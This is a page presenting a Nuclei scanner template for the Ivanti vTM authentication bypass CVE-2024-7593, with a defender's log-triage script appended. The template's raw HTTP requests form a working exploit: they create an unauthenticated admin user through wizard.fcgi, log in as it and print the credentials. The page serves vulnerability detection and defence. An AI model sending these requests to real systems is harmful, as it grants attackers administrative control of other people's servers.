Ivanti vTM - Authentication Bypass
ID: CVE-2024-7593
Severity: critical
Author: gy741
Tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev
Description
Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
YAML Source
id: CVE-2024-7593

info:
  name: Ivanti vTM - Authentication Bypass
  author: gy741
  severity: critical
  description: |
    Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7593
    - https://packetstormsecurity.com/files/download/179906/ivantiadc99-bypass.txt
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-7593
    cwe-id: CWE-287
    epss-score: 0.00043
    epss-percentile: 0.09526
  metadata:
    verified: true
    max-request: 2
    vendor: ivanti
    product: virtual traffic manager
    shodan-query:
      - http.favicon.hash:1862800928
      - html:"apps/zxtm/login.cgi"
  tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev

flow: http(1) && http(2)

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1
        Host: {{Hostname}}

        _form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}

    matchers:
      - type: word
        part: body
        words:
          - "wizardtitletext"
        internal: true

  - raw:
      - |
        @timeout: 15s
        POST /apps/zxtm/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: {{RootURL}}/apps/zxtm/login.cgi

        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="_form_submitted"

        form
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_username"

        {{username}}
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_password"

        {{password}}
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_submit"

        Login
        ------WebKitFormBoundarycznFUOqD0Y01A9B5--

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: /apps/zxtm/"
          - "Set-Cookie: ZeusTMZAUTH="
          - "Set-Cookie: ZeusTMZAUTHTIME="
        condition: and

      - type: status
        status:
          - 302

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a0047304502203e5c67146323a2633c8088e4b3ab9950c6d5880657d97331c06f1c40aef13927022100870cef93a824d5bae9e01e341b7184a711778e86f34557298dcfdbfa6e3b1485:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7593.yaml"
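For defenders, the two requests in the template double as a log signature: a POST to wizard.fcgi with the LocalUsers section in the query string, then a login from the same client that returns 302. The triage script below is an added example, not part of the template or the Nuclei project; the combined-log line format, the function name `triage` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (an assumption: adapt
# LINE_RE to whatever your reverse proxy or the admin server actually writes).
SAMPLE_LOG = """\
198.51.100.7 - - [14/Aug/2024:10:01:02 +0000] "POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1" 200 5120
198.51.100.7 - - [14/Aug/2024:10:01:05 +0000] "POST /apps/zxtm/login.cgi HTTP/1.1" 302 0
192.0.2.10 - admin [14/Aug/2024:10:05:00 +0000] "POST /apps/zxtm/login.cgi HTTP/1.1" 302 0
203.0.113.9 - - [14/Aug/2024:10:07:00 +0000] "GET /apps/zxtm/wizard.fcgi?error=1&section=Access%20Management:LocalUsers HTTP/1.1" 200 5120
203.0.113.50 - - [14/Aug/2024:10:09:00 +0000] "POST /apps/zxtm/wizard.fcgi?section=Access+Management%3ALocalUsers&error=1 HTTP/1.1" 200 5120
"""

# client IP, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def triage(log_text):
    """Return {client_ip: 'user-create' | 'user-create+login'} for matching clients."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _ts, method, target, status = m.groups()
        if method != "POST":
            continue  # both template requests are POSTs
        url = urlsplit(target)
        # parse_qs decodes %3A and '+' and does not care about parameter order
        query = parse_qs(url.query)
        if (url.path == "/apps/zxtm/wizard.fcgi"
                and query.get("error") == ["1"]
                and query.get("section") == ["Access Management:LocalUsers"]):
            findings[ip] = "user-create"
        elif (url.path == "/apps/zxtm/login.cgi" and status == "302"
                and ip in findings):
            # a redirecting login after the wizard request, same client
            findings[ip] = "user-create+login"
    return findings

if __name__ == "__main__":
    for ip, stage in triage(SAMPLE_LOG).items():
        print(ip, stage)
```

A hit only shows that the request was made, since the form body with the new username is not in the access log; confirm by reviewing the local users list for unexpected accounts in the admin group.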